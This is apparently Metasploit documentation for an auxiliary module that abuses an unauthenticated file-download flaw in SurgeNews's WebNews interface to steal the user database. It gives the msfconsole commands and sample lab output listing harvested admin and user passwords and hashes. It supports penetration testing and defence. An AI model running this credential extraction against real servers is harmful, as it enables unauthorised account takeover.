documentation/modules/auxiliary/scanner/http/surgenews_user_creds.md
This module exploits a vulnerability in the WebNews web interface of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated users to download arbitrary files from the software root directory; including the user database, configuration files and log files.
This module extracts the administrator username and password, and the usernames and passwords or password hashes for all users.
SurgeNews is a high performance, fully threaded, next generation News Server with integrated WebNews interface.
This module has been tested successfully on:
Installers:
msfconsoleuse auxiliary/scanner/http/surgenews_user_credsset rhosts [IP]runmsf > use auxiliary/scanner/http/surgenews_user_creds
msf auxiliary(surgenews_user_creds) > set rhosts 172.16.191.133 172.16.191.166
rhosts => 172.16.191.133 172.16.191.166
msf auxiliary(surgenews_user_creds) > run
[+] Found administrator credentials (admin:admin)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
admin admin true
qwerty@bt {ssha}BuFLjIFUUSy1IltX3AuN420qV2ZFU7EL false
user@bt {ssha}HFTkDsnNlLiaHN+sIS9VQarVGGXmYISn false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.133_surgenews.user.c_633569.txt
[*] Scanned 1 of 2 hosts (50% complete)
[+] Found administrator credentials (test:test)
[+] Found user credentials (zxcv@win-sgbsd5tqutq:zxcv)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
asdf@win-sgbsd5tqutq {ssha}8ytixKjxf3kaBc6T471R1Re/C8MUnKnF false
test test true
test@win-sgbsd5tqutq {ssha}Vw8EkFxAJuiZrb98Fz+sdr/yEEmBZ2Jc false
test@win-sgbsd5tqutq {ssha}j4teSf4CgA3+XVRJscFHyqoOQJRoLg4K false
zxcv@win-sgbsd5tqutq zxcv false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.166_surgenews.user.c_077983.txt
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed